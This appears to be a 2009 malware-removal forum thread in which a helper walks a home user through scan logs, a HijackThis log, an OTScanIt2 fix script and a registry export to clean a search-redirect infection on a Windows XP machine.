"MouseSynchIn100ns"=dword:01312d00
"SampleRate"=dword:00000064
"WheelDetectionTimeout"=dword:000005dc
"MouseInitializePolled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet005\Enum\ACPI\PNP0F13\3&13c0b0c5&0\LogConf]
"BasicConfigVector"=hex(a):48,00,00,00,0f,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,..
"BootConfig"=hex(8):01,00,00,00,0f,00,00,00,00,00,00,00,01,00,01,00,01,00,00,00,02,..
scanning hidden registry entries ...
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Reinstall\\xd8P\23]
"DisplayName"="\x3f18\23\x4150\23"
"DeviceDesc"="\x3f18\23\x4150\23"
"ProviderName"=""
"MFG"="\x435c\x616c\x7373\"
"ReinstallString"="C:\WINDOWS\System32\ReinstallBackups\\x50d8\23\DriverFiles\.INF"
"DeviceInstanceIds"=str(7):"09236.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher]
"TracesProcessed"=dword:00000c6e
scanning hidden files ...
scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 1
< Document and Settings folder & sub folders >
scanning hidden files ...
C:\Documents and Settings\All Users\Application Data\TEMP:5C321E34 120 bytes
C:\Documents and Settings\David\Favorites\Bible Gateway.url:favicon 1150 bytes
C:\Documents and Settings\David\Favorites\Free Translation Online.url:favicon 2238 bytes
C:\Documents and Settings\David\Favorites\Google.url:favicon 1406 bytes
C:\Documents and Settings\David\Favorites\Links\Calendar.url:favicon 1150 bytes
C:\Documents and Settings\David\Favorites\Links\Economist.com.url:favicon 1406 bytes
C:\Documents and Settings\David\Favorites\Links\Gmail.url:favicon 1406 bytes
C:\Documents and Settings\David\Favorites\Links\Google.url:favicon 1406 bytes
C:\Documents and Settings\David\Favorites\Links\LogMeIn.url:favicon 2550 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\AdSense.url:favicon 1406 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\Constant Contact.url:favicon 0 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\EurekAlert! Public News List.url:favicon 1406 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\FeedBurner .url:favicon 1150 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\Google Analytics.url:favicon 1406 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\Photobucket.url:favicon 1150 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\Picasa Web Albums - Dr. Richards.url:favicon 1406 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\About Chiropractic.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Contact Us.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Credits.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Directions.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Home.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Meet Dr. Richards.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\New Patient Info.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Research.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Spine~Mail Blog.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Testimonials Blog.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RichardsChiropractic.com\Testimonials Page.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RSS Feed Spine~Mail Feedburner\FeedForAll Index.url:favicon 318 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RSS Feed Spine~Mail Feedburner\FeedForAll and RSS Support.url:favicon 318 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RSS Feed Spine~Mail Feedburner\My Feeds.url:favicon 1150 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RSS Feed Spine~Mail Feedburner\Publicize BuzzBoost (2).url:favicon 1150 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RSS Feed Spine~Mail Feedburner\Publicize BuzzBoost.url:favicon 1150 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RSS Feed Spine~Mail Feedburner\rss2html.php URL tool.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\RSS Feed Spine~Mail Feedburner\Spine~Mail News from Dr. Richards.url:favicon 1150 bytes
C:\Documents and Settings\David\Favorites\Links\My Website\rss2html.php URL tool.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Links\Pandora.url:favicon 15086 bytes
C:\Documents and Settings\David\Favorites\Links\Wachovia.url:favicon 7406 bytes
C:\Documents and Settings\David\Favorites\NickJr.com--Play to Learn with Dora the Explorer, Blue's Clues, Little Bill and More!.url:favicon 3384 bytes
C:\Documents and Settings\David\Favorites\RhymeZone.url:favicon 318 bytes
C:\Documents and Settings\David\Favorites\rss2html.php URL tool.url:favicon 3262 bytes
C:\Documents and Settings\David\Favorites\Welcome to Sweetwater.com Call Us @ 800 222 4700.url:favicon 5222 bytes
C:\Documents and Settings\Katherine\Favorites\Links\Gmail.url:favicon 1406 bytes
C:\Documents and Settings\Katherine\Favorites\Links\LogMeIn.url:favicon 2550 bytes
C:\Documents and Settings\Katherine\Favorites\Links\My eBay.url:favicon 1406 bytes
C:\Documents and Settings\Katherine\Favorites\Links\NickJr.url:favicon 3384 bytes
C:\Documents and Settings\Katherine\Favorites\Links\Pandora.url:favicon 15086 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\About Chiropractic.url:favicon 3262 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\Contact Us.url:favicon 3262 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\Customer Login - Online email marketing software from Constant Contact.url:favicon 0 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\Directions.url:favicon 3262 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\Download Free Article Directory Software Script Enterprise Web Content Management System CMS PHP Program.url:favicon 3638 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\Home.url:favicon 3262 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\Meet Dr. Richards.url:favicon 3262 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\New Patient Info.url:favicon 3262 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\Patient Testimonials Blog.url:favicon 3262 bytes
C:\Documents and Settings\Katherine\Favorites\Links\RFC.com\Spine~Mail.url:favicon 3262 bytes
C:\Documents and Settings\Katherine\Favorites\Links\TurboTax Online.url:favicon 4838 bytes
C:\Documents and Settings\Katherine\Favorites\Links\Wachovia.url:favicon 7406 bytes
C:\Documents and Settings\Katherine\Favorites\Linksys Technical Support.url:favicon 3638 bytes
C:\Documents and Settings\Katherine\My Documents\baby shoes - Pip Squeakers - baby shoes.url:favicon 1406 bytes
C:\Documents and Settings\Katherine\My Documents\Katie's Old Documents\Desktop\Favorites\YRE - Wormsloe State Historic Site, Georgia - Happy Wanderers.url:favicon 1406 bytes
C:\Documents and Settings\Katie\Favorites\Gmail.url:favicon 1150 bytes
C:\Documents and Settings\Katie\Favorites\Google Personal Homepage.url:favicon 1406 bytes
C:\Documents and Settings\Katie\Favorites\Links\Gmail.url:favicon 1406 bytes
C:\Documents and Settings\Katie\Favorites\Links\Wachovia.URL:favicon 7406 bytes
C:\Documents and Settings\Katie\Favorites\LogMeIn.url:favicon 2550 bytes
C:\Documents and Settings\Katie\Favorites\My eBay Summary.url:favicon 1406 bytes
scan completed successfully
hidden files: 651
< End of report >
[/code]
Hi drrchrds
Multiple Anti-Virus Software
You have more than one anti-virus application running on your computer:
Avira
McAfee
The problem with having more than one anti-virus application running is that they will be fighting over the same rights, and this can make your system unstable as well as reduce your security rather than increase it.
A couple steps back, I ran the F-Secure scan and it didi find something, but I did not remove it. Last night i was curious to see if Avira would find it, and it did. I assume they found the same thing, F-scan called it TrackingCookie.Revsci and Avira called it HTML.Rce.Gen.
Tracking or third-party cookies come from outside the site you're visiting -- usually, from advertising agencies that place ads at many sites. These companies can combine data gathered by their cookies to see what you read at different sites, but they can learn your identity only if you (or the sites that buy their services) provide that to them.
Please read: Firefox's Cookie Options (http://mozilla.gunnars.net/firefox_help_firefox_cookie_tutorial.html)
Should I have Avira quarantine it?
yes you can do it
Also, I have been using McAfee for a long time but I wonder if I would be just as well off with AVG or Avira or something else. What do you recommend?
I have avira and comodo
Lastly, I have used spybot for years, but do you recommend that I add an additional malware program to the mix? like Malwarebytes or something else?
spybot is a very good program and MalwareBytes AntiMalware is a good program to have and to run every few weeks just to be sure that you are still clean.
Start OTScanIt2. Copy/Paste the information in the codebox below into the pane where it says "Paste fix here" and then click the Run Fix button.
[Files/Folders - Created Within 30 Days]
NY -> x73_lut.dat -> %ProgramFiles%\x73_lut.dat
NY -> gtx73.ini -> %ProgramFiles%\gtx73.ini
[Files/Folders - Modified Within 30 Days]
NY -> qmgr1.dat -> %AllUsersProfile%\Application Data\Microsoft\Network\Downloader\qmgr1.dat
NY -> qmgr0.dat -> %AllUsersProfile%\Application Data\Microsoft\Network\Downloader\qmgr0.dat
NY -> DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini -> %UserProfile%\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
NY -> sqmdata15.sqm -> %SystemDrive%\sqmdata15.sqm
NY -> sqmnoopt15.sqm -> %SystemDrive%\sqmnoopt15.sqm
The fix should only take a very short time. When the fix is completed a message box will popup either telling you that it is finished, or that a reboot is needed to complete the fix. If the fix is complete, click the Ok button and Notepad will open with a log of actions taken during the fix. Post that log back here in your next reply.
Thanks peku006
drrchrds
2009-02-14, 01:14
BTW, I am uninstalling McAfee and installing Comodo.
If I have both Avira and Comodo, should I have Comodo active or Avira?
I regularly use 3 other computers, what can I do to avoid this infection on the others? I read in Wikipedia (http://en.wikipedia.org/wiki/Vundo)that Vundo exploits a vulnerability in Java.
Is the removal of old Java and the installation of new Java enough to protect them? The same Wiki page recommends PeerGuardian (http://phoenixlabs.org/pg2/) to protect. Any thoughts?
OT Scan Log:
[Files/Folders - Created Within 30 Days]
C:\Program Files\x73_lut.dat moved successfully.
C:\Program Files\gtx73.ini moved successfully.
[Files/Folders - Modified Within 30 Days]
File move failed. C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr1.dat scheduled to be moved on reboot.
File move failed. C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr0.dat scheduled to be moved on reboot.
C:\Documents and Settings\David\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini moved successfully.
C:\sqmdata15.sqm moved successfully.
C:\sqmnoopt15.sqm moved successfully.
< End of fix log >
OTScanIt2 by OldTimer - Version 1.0.7.1 fix logfile created on 02132009_183114
Files moved on Reboot...
File move failed. C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr1.dat scheduled to be moved on reboot.
File move failed. C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr0.dat scheduled to be moved on reboot.
Registry entries deleted on Reboot...
Hi drrchrds
Avira is antivirus and Comodo is firewall
Is the removal of old Java and the installation of new Java enough to protect them?
No, but it helps if java has been updated
The same Wiki page recommends PeerGuardian to protect. Any thoughts?
I have never used PeerGuardian .I do not recommend it ,because it´s only blocking incoming and outgoing connections based on IP blocklists
(and I do not use P2P programs :) )
Peer Guardian is a simple software firewall designed for use with Microsoft Windows P2P file sharing clients. Peer Guardian works, first, by maintaining a database of IP addresses, logging and/or blocking incoming requests coming from those addresses. Secondly, Peer Guardian may prevent outcoming connections to fake P2P servers.
How's the computer running now?
drrchrds
2009-02-14, 16:28
I was still having redirects after all that! I loaded Comodo Internet Suite and it found 30 things! I quarantined them all. I also ran CCleaner and did the registry scan.
Also, IE loaded when I restarted my computer and Comodo had a popup taht said something like "Comodo is learning : Internet Explorer alters the key XYZ123 (I don't remember what it was)". That may be because I stopped some of my startup programs in spybot. Too bad you cant just uninstall IE! :FF:
I took some screenshots because I wasn't sure how to get text files from these things.
Files Quarantined by Comodo:
http://i200.photobucket.com/albums/aa312/drrchrds/Comodo-Quarantined.jpg
CCleaner Registry - Morpheus Toolbar? I never had one. I did use Morpheus for a while, but never used a toolbar.:
http://i200.photobucket.com/albums/aa312/drrchrds/CCleaner-Registry.jpg
Here is an example of redirects, I opened the search results into new tabs and you can see what I got instead! Other common ones are Yahoo HotJobs, CowSurvey, Various AntiVirus Sites, Various Search Sites, etc...
http://i200.photobucket.com/albums/aa312/drrchrds/search-results.jpg
Actually, this is pretty typical, if I load 5 search results into tabs, 4 will be bogus and one will be something I actually clicked on.
Don't know if this helps, but here is an updated HJT:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:26:53 AM, on 2/14/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDOWS\system32\EloSrvce.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\LogMeIn\x86\RaMaint.exe
C:\WINDOWS\system32\EloDkMon.exe
C:\Program Files\LogMeIn\x86\LogMeIn.exe
C:\WINDOWS\system32\EloTTray.exe
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\Microsoft LifeCam\MSCamS32.exe
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\COMODO\COMODO Internet Security\cfp.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\WINDOWS\system32\pctspk.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\UAService7.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll
O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [nForce Tray Options] sstray.exe /r
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\COMODO Internet Security\cfp.exe" -h
O4 - HKCU\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: ERUNT AutoBackup.lnk = C:\Program Files\ERUNT\AUTOBACK.EXE
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk.disabled
O4 - Startup: OpenOffice.org 2.4.lnk.disabled
O4 - Global Startup: Acrobat Assistant.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.exe.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.lnk.disabled
O4 - Global Startup: Adobe Reader Speed Launch.lnk.disabled
O4 - Global Startup: Device Detector 2.lnk.disabled
O4 - Global Startup: Device Detector 3.lnk.disabled
O4 - Global Startup: HP Digital Imaging Monitor.lnk.disabled
O4 - Global Startup: Microsoft Office.lnk.disabled
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk.disabled
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Share in Hello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra 'Tools' menuitem: Share in H&ello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {474F00F5-3853-492C-AC3A-476512BBC336} (UploadListView Class) - http://picasaweb.google.com/s/v/19.13/uploader2.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcafee.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
O16 - DPF: {664088B0-6AF3-4514-AF9D-A0DC3A3DF24A} (F-Secure Online Scanner 3.3) - http://support.f-secure.com/ols3beta/fscax.cab
O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/suite/yautocomplete.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} - http://download.mcafee.com/molbin/shared/mcgdmgr/1,0,0,26/mcgdmgr.cab
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: Avira AntiVir Personal - Free Antivirus Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - Unknown owner - C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
O23 - Service: EloSystemService - Elo Touchsystems, Inc. - C:\WINDOWS\system32\EloSrvce.exe
O23 - Service: Google Desktop Manager 5.8.811.4345 (GoogleDesktopManager-110408-113106) - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
O23 - Service: Google Update Service (gupdate1c98bee6cb9fb98) (gupdate1c98bee6cb9fb98) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINDOWS\system32\LEXBCES.EXE
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PCTEL Speaker Phone (Pctspk) - PCtel, Inc. - C:\WINDOWS\system32\pctspk.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe
--
End of file - 10286 bytes
drrchrds
2009-02-14, 17:05
[Note: I also have another reply above this one]
Would this work:
Purchase a new SATA HD (1TB is cheap these days!!)
Take out my current drives (IDE's)
Load Windows
Then re-insert my current drives as secondary (slave) drives and copy desired files onto the new C drive.
Format the old drives.
Would the new C drive just get infected straight away?
Or does the infection need to be on C in order to work?
Or am I getting ahead of myself.
Hi drrchrds
I restarted my computer and Comodo had a popup taht said something like "Comodo is learning
Please read this (http://forums.comodo.com/help/faqsthreads_read_me_first-t9364.0.html)
Files Quarantined by Comodo:
a lot of files in the System Restore and they are no active........
I do not know why you have this
C:\Program Files\Sibelius Software 3 \Keygen.exe
all of them "Heur.Packed" are legitimate program. I do not know why Comodo has moved them to quarantine
CCleaner removes only empty registry values
Registry Cleaners, not recommended (http://forums.spybot.info/showthread.php?t=30113)
Open Notepad.
Copy the text from the box to an empty file.
Save it as export.bat to your desktop.
Choose save as all types
regedit /e C:\look.txt "HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32"
Close Notepad.
Locate Export.bat on your Desktop and double-click on it It will create a file called look.txt in C:\
Copy the entire text and past it to your reply here in this topic.
Thanks peku006
drrchrds
2009-02-15, 18:56
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"midimapper"="midimap.dll"
"msacm.imaadpcm"="imaadp32.acm"
"msacm.msadpcm"="msadp32.acm"
"msacm.msg711"="msg711.acm"
"msacm.msgsm610"="msgsm32.acm"
"msacm.trspch"="tssoft32.acm"
"vidc.cvid"="iccvid.dll"
"VIDC.I420"="msh263.drv"
"vidc.iv31"="C:\\WINDOWS\\system32\\ir32_32.dll"
"vidc.iv32"="C:\\WINDOWS\\system32\\ir32_32.dll"
"VIDC.IYUV"="iyuv_32.dll"
"vidc.mrle"="msrle32.dll"
"vidc.msvc"="msvidc32.dll"
"VIDC.UYVY"="msyuv.dll"
"VIDC.YUY2"="msyuv.dll"
"VIDC.YVU9"="tsbyuv.dll"
"VIDC.YVYU"="msyuv.dll"
"wavemapper"="msacm32.drv"
"msacm.msg723"="msg723.acm"
"vidc.M263"="msh263.drv"
"vidc.M261"="msh261.drv"
"msacm.msaudio1"="msaud32.acm"
"msacm.sl_anet"="sl_anet.acm"
"msacm.l3acm"="C:\\WINDOWS\\System32\\l3codeca.acm"
"vidc.DIVX"="divx.dll"
"wave"="wdmaud.drv"
"midi"="wdmaud.drv"
"mixer"="wdmaud.drv"
"vidc.ir41"="C:\\WINDOWS\\System32\\ir41_32.ax"
"msacm.iac2"="C:\\WINDOWS\\System32\\iac25_32.ax"
"vidc.iv50"="ir50_32.dll"
"vidc.iv41"="ir41_32.ax"
"msacm.voxacm160"="vct3216.acm"
"VIDC.SP53"="SP5X_32.DLL"
"VIDC.SP54"="SP5X_32.DLL"
"VIDC.SP55"="SP5X_32.DLL"
"VIDC.SP56"="SP5X_32.DLL"
"VIDC.SP57"="SP5X_32.DLL"
"VIDC.SP58"="SP5X_32.DLL"
"VIDC.SP59"="SP5X_32.DLL"
"MSVideo"="vfwwdm32.dll"
"MSVideo8"="VfWWDM32.dll"
"wave1"="wdmaud.drv"
"mixer1"="wdmaud.drv"
"wave2"="wdmaud.drv"
"mixer2"="wdmaud.drv"
"wave3"="wdmaud.drv"
"mixer3"="wdmaud.drv"
"midi1"="KORGUMDD.DRV"
"wave4"="wdmaud.drv"
"midi2"="wdmaud.drv"
"mixer4"="wdmaud.drv"
"aux"="wdmaud.drv"
"wave5"="wdmaud.drv"
"midi3"="wdmaud.drv"
"mixer5"="wdmaud.drv"
"aux1"="wdmaud.drv"
"wave6"="wdmaud.drv"
"mixer6"="wdmaud.drv"
"vidc.VP60"="vp6vfw.dll"
"vidc.VP61"="vp6vfw.dll"
"vidc.VP62"="vp6vfw.dll"
"VIDC.XVID"="xvidvfw.dll"
"VIDC.YV12"="yv12vfw.dll"
"msacm.ac3acm"="ac3acm.acm"
"msacm.lameacm"="lameACM.acm"
"VIDC.FFDS"="ff_vfw.dll"
"wave7"="wdmaud.drv"
"midi4"="wdmaud.drv"
"mixer7"="wdmaud.drv"
"aux2"="wdmaud.drv"
"wave8"="wdmaud.drv"
"midi5"="wdmaud.drv"
"mixer8"="wdmaud.drv"
"aux3"="wdmaud.drv"
"wave9"="wdmaud.drv"
"mixer9"="wdmaud.drv"
"msacm.siren"="sirenacm.dll"
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32\Terminal Server]
